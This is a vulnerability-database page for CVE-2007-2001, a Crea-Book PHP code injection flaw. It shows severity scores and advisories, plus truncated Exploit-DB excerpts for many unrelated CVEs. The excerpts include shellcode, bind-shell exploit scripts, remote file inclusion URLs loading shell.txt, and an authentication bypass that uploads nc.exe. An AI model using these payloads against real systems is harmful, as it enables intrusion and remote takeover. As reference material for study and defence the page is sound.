CVE-2007-2001
Published 2007-04-12
Priority: P3 · 35 · medium · 6.5 (CVSS 2.0) · AV:N/AC:L/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS: 2.02% (78.5th percentile)
Multiple direct static code injection vulnerabilities in admin/configurer2.php in Crea-Book 1.0 and earlier allow remote authenticated administrators to execute arbitrary PHP code via the "Fond de la page" (background color) field and other unspecified fields, which injects into config.inc.php3.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crea-book | crea-book | <= 1.0 | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| vendor_redhat | — | 7.2 | HIGH | — |
GHSA
CVE-2007-2001 [MEDIUM] GHSA-vm2q-qmjf-qfhq: Multiple direct static code injection vulnerabilities in admin/configurer2
ghsa_unreviewed · 2022-05-01
Multiple direct static code injection vulnerabilities in admin/configurer2.php in Crea-Book 1.0 and earlier allow remote authenticated administrators to execute arbitrary PHP code via the "Fond de la page" (background color) field and other unspecified fields, which injects into config.inc.php3.
Red Hat
CVE-2007-4559 [LOW] CWE-22 python: tarfile module directory traversal
vendor_redhat · 2007-08-24 · CVSS 2.1
Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.
A flaw was found in the Python tarfile module. Extracting a crafted TAR archive with the tarfile.extract or tarfile.extractall functions could lead to a directory traversal vulnerability, resulting in overwrite of arbitrary files.
Statement: Red Hat Product Security has rated this issue as having a Moderate security impact; a future update may address this flaw. More information regarding issue severity can be found here: https://access.redhat.com/security/updates/classif
Red Hat
CVE-2007-2452 [HIGH] Heap-based buffer overflow in the visit_old_format function in locate/locate
vendor_redhat · CVSS 7.2
Heap-based buffer overflow in the visit_old_format function in locate/locate.c in locate in GNU findutils before 4.2.31 might allow context-dependent attackers to execute arbitrary code via a long pathname in a locate database that has the old format, a different vulnerability than CVE-2001-1036.
Statement: Not vulnerable. Red Hat did not ship GNU locate in Red Hat Enterprise Linux 2.1, 3, 4, or 5. This issue does not affect the mlocate or slocate packages that are supplied with Red Hat Enterprise Linux.
Red Hat
CVE-2007-2243 [MEDIUM] OpenSSH 4
vendor_redhat · CVSS 5.0
OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
Statement: Not vulnerable. The OpenSSH packages as shipped with Red Hat Enterprise Linux do not contain S/KEY support.
No detection rules found.
Exploit-DB
CVE-2007-1195 XM Easy Personal FTP Server 5.30 - Remote Format String Write4
exploitdb · 2012-06-14
---
#!/usr/bin/python
# XM Easy Personal FTP Server v 2
# (+) Choose your option:
# 1. use no authentication (anonymous is disabled)
# 2. use authentication (anonymous is enabled)
# --> 1
# (+) Connecting to the target 192.168.153.160:21
# (+) Seeding payload...
# (+) Triggering write4....
# (+) Connecting to the targets shell!
# Connection to 192.168.153.160 4444 port [tcp/*] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\steve>
#
# example exploitation against Windows Server 23k:
#
# mr_me@gliese:~/pentest/research/targets/xm$ ./poc_working.py 192.168.153.159
# -------------------------------------------------------------------------
# XM Easy Per
Exploit-DB
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow
exploitdb · 2009-09-03
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
    print "[*] Usage: %s " % sys.argv[0]
    sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB
CVE-2008-3368 ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion
exploitdb · 2008-07-28
---
#####################################################################################
#### ATutor Course Server Rfi ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm) #
#Discovered by : IRCRASH (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm #
#####################################################################################
# #
#Script Download : www.atutor.ca #
# #
#DORK : "Web site engine's code is copyright © 2001-2007 ATutor®" #
# #
#Note : You must login , then use rfi bug ;) #
#####################################################################################
# [Rfi] #
# #
#http://Example/tools/packages/
Exploit-DB
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb · 2008-05-23 · CVSS 7.5
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
CVE-2007-5592 awzMB 4.2 Beta 1 - Multiple Remote File Inclusions
exploitdb · 2007-10-18
---
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : awzMB system Version 4.2 beta 1 Guestbook/Weblog/Contact
Download : http://downloads.sourceforge.net/awzmb/awzmb_4.2_beta1.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : [email protected] / [email protected]
OurForum : http://svvat.3host.biz/forum/index.php
Dork : Copyright © 2001-2007 awzMB Project
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
if (!isset($Setting[OPT_includepath])) $Sett
Exploit-DB
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb · 2007-08-09
---
http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
    die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x
Exploit-DB
CVE-2007-2783 Rational Software Hidden Administrator 1.7 - Authentication Bypass
exploitdb · 2007-05-19
---
####################################################################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# https://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h -p -t #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################
Exploit-DB
CVE-2007-2204 GPB Bulletin Board - Multiple Remote File Inclusions
exploitdb · 2007-04-24
---
#GPB bulletin board Remote file include
#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz
#D0rk : Download Script and install it in ur machine
#Exploit :
#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?
#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?
#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger100[at]hotmail[dot]com
# milw0rm.com [2007-04-24]
Exploit-DB
CVE-2007-2001 Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
exploitdb · 2007-04-10
---
/=======================================\
| Advisory :: Crea-Book [fr/en] |
| Date : 2007-04-10 |
| Last update : 2007-04-10 |
| |
+-------------------------------------------------------------------------------------------------------+
| Summary : 0] Description |
| 1] Vuln#1 : Administrative Access Bypass using basic SQL injection |
| 2] Vuln#2 : PHP Code Execution Weakness |
| 3] Links & Documentation |
\-------------------------------------------------------------------------------------------------------/
DESCRIPTION
This script is old but analysing it is a good way to understand some classic security holes in web
applications. It's just a good and fast training.
Let's g0 ...
VULNERABILITY #1 : ADMINI
Exploit-DB
CVE-2007-1365 OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow
exploitdb · 2007-03-09
---
source: https://www.securityfocus.com/bid/22901/info
OpenBSD is prone to a remote buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
A remote attacker can exploit this issue to execute arbitrary code with kernel-level privileges or to crash the affected computer. Successful exploits will result in a complete compromise of vulnerable computers or cause denial-of-service conditions.
#
# Description:
# OpenBSD ICMPv6 fragment remote execution PoC
#
# Author:
# Alfredo Ortega
# Mario Vilas
#
# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc.
# All rights reserved
from impacket import ImpactPacket
import struc
Exploit-DB
CVE-2007-0845 Advanced Poll 2.0.5-dev - Remote Admin Session Generator
exploitdb · 2007-02-07
---
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
#
# 0day! KEEP IT PRIVATE 0day!
#
# date: 30/07/06
#
# diwou
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).
use strict;
use warnings;
use LWP::UserAgent;
use MD5;
my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/
Exploit-DB
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (3)
exploitdb · 2006-10-06
---
source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' comm
Exploit-DB
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (2)
exploitdb · 2001-06-21
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
Exploit-DB
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (1)
exploitdb · 2001-06-21
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
No writeups or analysis indexed.